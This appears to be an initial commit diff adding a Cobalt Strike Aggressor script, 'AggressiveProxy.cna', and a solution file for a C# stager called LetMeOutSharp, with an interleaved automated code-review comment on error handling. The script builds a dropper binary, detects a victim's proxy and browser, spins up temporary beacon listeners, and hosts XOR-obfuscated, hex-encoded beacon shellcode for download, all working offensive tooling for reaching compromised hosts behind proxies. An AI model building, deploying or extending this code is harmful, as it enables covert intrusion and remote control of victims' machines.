
Commit 57428ea

committed
Initial Commit
0 parents  commit 57428ea


12 files changed

+2207
-0
lines changed


.gitignore

Lines changed: 405 additions & 0 deletions
Large diffs are not rendered by default.

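--- a/AggressiveProxy.cna
+++ b/AggressiveProxy.cna
@@ -0,0 +1,215 @@
+global('$selected_listener $proxy_handler_url');
+
+$msbuild = "/Library/Frameworks/Mono.framework/Versions/Current/Commands/msbuild";
+
+menubar("Proxy Handler", "proxy_handler");
+
+popup proxy_handler {
+item "&Start Handler" {
+start_handler();
+}
+item "&Stop Handler" {
+stop_handler();
+}
+item "&Clean-up hosted content" {
+clean_site_contents();
+}
+}
+
+sub start_handler {
+local('$dialog');
+if($selected_listener) {
+show_message("[AggressiveProxy] ERROR: Already started...");
+exit();
+}
+$dialog = dialog("Proxy Handler Generation", %(listener => "", checkurl => "/proxy", responseContent => "ok"), &start_handler_Callback);
+drow_listener_stage($dialog, "listener", "Listener: ");
+drow_text($dialog, "checkurl", "Check URL: ");
+drow_text($dialog, "responseContent", "Expected Response Content: ");
+dbutton_action($dialog, "Start & Build binary");
+dialog_show($dialog);
+}
+
+sub build_letmeout {
+local('$url $responseContent $handle $data $destination $buildver $build');
+$url = $1;
+$responseContent = $2;
+
+println($url);
+$handle = openf(script_resource("LetMeOutSharp/LetMeOutSharp/Program_template.cs"));
+$data = readb($handle, -1);
+closef($handle);
+
+$data = strrep($data, "%C2URL%", $url);
+$data = strrep($data, "%RESPONSE%", $responseContent);
+
+$destination = openf(">".script_resource("LetMeOutSharp/LetMeOutSharp/Program.cs"));
+writeb($destination,$data);
+closef($destination);
+$buildver = "Release"; # "Release" or "Debug"
+
+println("[AggressiveProxy] INFO: Using msbuild: $msbuild");
+$build = exec($msbuild . " -m -t:Rebuild -p:Configuration=" . $buildver . " -p:NoWarn=0168 " . script_resource("LetMeOutSharp/LetMeOutSharp.sln"));
+wait($build);
+# println(readAll($build)); # remove
+closef($build);
+println("[AggressiveProxy] INFO: The binary file should be located at: " . script_resource("LetMeOutSharp/LetMeOutSharp/bin/" . $buildver . "/letmeout.exe"));
+}
+
+sub start_handler_Callback {
+local('%info $ssl $checkurl $responseContent');
+if($selected_listener) {
+show_message("[AggressiveProxy] ERROR: Already started...");
+exit();
+}
+
+clean_site_contents();
+println("[AggressiveProxy] INFO: Start serving...");
+if ($3['listener'] eq "") {
+show_message("[AggressiveProxy] ERROR: No listener specified!");
+exit();
+}
+
+%info = listener_info($3['listener']);
+
+if(%info['payload'] ne "windows/beacon_http/reverse_http" && %info['payload'] ne "windows/beacon_https/reverse_https")
+{
+show_message("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
+elog("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
+println("[AggressiveProxy] ERROR: Only HTTP and HTTPS beacons support a proxy");
+exit();
+}
+
+$selected_listener = copy(%info);
+println("[AggressiveProxy] INFO: Base listener is: $selected_listener['name']");
+
+$selected_listener['name'] = 'agproxy';
+$selected_listener['status'] = $null;
+$ssl = false;
+
+if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") {
+println("[AggressiveProxy] INFO: Using HTTPS");
+$ssl = true;
+}
+
+$checkurl = $3['checkurl'];
+if(left($checkurl,1) ne "/") {
+println("[AggressiveProxy] WARNING: Url needs to start with /. Adding /.");
+$checkurl = "/" . $checkurl;
+}
+$responseContent = $3['responseContent'];
+
+$proxy_handler_url = $checkurl;
+$url = site_host($selected_listener['host'], $selected_listener['port'], $checkurl, $responseContent, "text/plain", "Proxy Shellcode Handler", $ssl);
+build_letmeout($url, $responseContent);
+}
+
+sub stop_handler {
+if($selected_listener) {
+println("[AggressiveProxy] INFO: Stopping...");
+clean_site_contents();
+$selected_listener = $null;
+}
+}
+
+sub clean_site_contents {
+# Cleanup site contents
+local('$type $key $value $description');
+println("[AggressiveProxy] INFO: Cleaning site contents...");
+foreach $key => $value (sites()){
+$type = $value['Type'];
+$description = $value['Description'];
+if($type eq "page" && $description eq "Proxy Shellcode Handler") {
+site_kill($value['Port'], $value['URI']);
+}
+if($type eq "page" && $description eq "Proxy enabled shellcode") {
+site_kill($value['Port'], $value['URI']);
+}
+}
+}
+
+println("[AggressiveProxy] INFO: Serving you...");
+
+on web_hit {
+
+local('$temp_listener_options $b64proxy $b64useragent $is64 $proxy $useragent $data $hexdata $payload $listener_name $arch $proxyshellcodeurl $variant');
+
+if($selected_listener) {
+if ($2 eq $proxy_handler_url) {
+println("[AggressiveProxy] INFO: Proxy handler URL: $proxy_handler_url");
+println("[AggressiveProxy] INFO: Visit in the proxy handler URL from: $3");
+$b64proxy = $8['a'];
+$b64useragent = $8['b'];
+$is64 = $8['c'];
+$proxy = base64_decode($b64proxy);
+$useragent = base64_decode($b64useragent);
+$variant = "";
+if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36") {
+# Chrome
+$variant = "chrome";
+} else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51") {
+# Edge
+$variant = "edge";
+} else if($useragent eq "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0") {
+# Firefox
+$variant = "firefox";
+} else {
+# default
+$variant = "default";
+}
+println("[AggressiveProxy] INFO: The proxy received is: $proxy");
+println("[AggressiveProxy] INFO: User-agent: $useragent");
+println("[AggressiveProxy] INFO: Variant to use: $variant");
+
+$temp_listener_options = copy($selected_listener);
+$temp_listener_options['name'] = $null;
+$temp_listener_options['payload'] = $null;
+
+if($proxy) {
+if(right($proxy,1) eq "/")
+{
+$proxy = left($proxy,-1); #COBALT BUG with slash
+}
+$temp_listener_options['proxy'] = $proxy;
+} else {
+println("[AggressiveProxy] INFO: Using direct connectivity")
+$temp_listener_options['proxy'] = "*direct*";
+}
+
+$arch = "x64";
+if($is64 eq "0") {
+$arch = "x86";
+}
+
+$temp_listener_options['profile'] = $variant;
+$proxyshellcodeurl = $b64proxy . base64_encode($variant) . base64_encode($arch);
+$listener_name = "agproxy-rand" . rand(10000);
+
+println("[AggressiveProxy] INFO: Using payload for: $selected_listener['payload']");
+listener_create_ext($listener_name, $selected_listener['payload'], $temp_listener_options); # This will log a java.lang.RuntimeException: Another Beacon listener exists on your cobalt console
+println("[AggressiveProxy] INFO: Started temp listener: $listener_name");
+
+when("listeners", lambda({
+local('$data $xordata $hexdata $ssl');
+println("[AggressiveProxy] INFO: Generating & hosting new payload \($listener_name - $arch\)");
+$data = artifact_payload($listener_name, "raw", $arch);
+$xordata = str_xor($data, chr(42));
+$hexdata = transform($xordata, "hex");
+$ssl = false;
+if($selected_listener['payload'] eq "windows/beacon_https/reverse_https") {
+println("[AggressiveProxy] INFO: Using HTTPS");
+$ssl = true;
+}
+println("[AggressiveProxy] INFO: Shellcode length: " . strlen($hexdata));
+println("[AggressiveProxy] INFO: Hosting payload at: /$proxyshellcodeurl")
+site_host($selected_listener['host'], $selected_listener['port'], "/$proxyshellcodeurl", "$hexdata", "text/plain", "Proxy enabled shellcode", $ssl);
+listener_delete($listener_name);
+
+
+}, $proxyshellcodeurl => $proxyshellcodeurl, $listener_name => $listener_name, $arch => $arch));
+}
+} else {
+elog("[AggressiveProxy] WARNING: Not started yet");
+println("[AggressiveProxy] WARNING: Not started yet");
+}
+}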
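Review bot: In `build_letmeout` (new lines 39-56) no I/O result is checked: both `openf` handles are used without consulting `checkError`, the msbuild output is never read, and the final message prints the binary path whether or not the build succeeded. A missing `Program_template.cs`, or no msbuild at the hard-coded macOS path, would therefore go unnoticed and may leave a stale `letmeout.exe` from an earlier build in place. After each `openf` I would add `if (checkError($error)) { show_message("[AggressiveProxy] ERROR: $error"); return; }`, and read the build output before `closef($build)` instead of keeping the commented-out `readAll`. The dialog values are also substituted into the C# template verbatim, so a `"` or backslash in the response content presumably breaks the generated source (the template is not visible here). Separately, `$url` on new line 103 is missing from that function's `local(...)` list, and the `println(...)` calls on new lines 175 and 204 lack the terminating semicolon the rest of the file uses.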

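--- a/LetMeOutSharp.sln
+++ b/LetMeOutSharp.sln
@@ -0,0 +1,17 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LetMeOutSharp", "LetMeOutSharp\LetMeOutSharp.csproj", "{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|anycpu = Debug|anycpu
+Release|anycpu = Release|anycpu
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.ActiveCfg = Debug|anycpu
+{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Debug|anycpu.Build.0 = Debug|anycpu
+{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.ActiveCfg = Release|anycpu
+{7B0A5CB5-5192-4469-95E8-FF127F4E2FEF}.Release|anycpu.Build.0 = Release|anycpu
+EndGlobalSection
+EndGlobal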
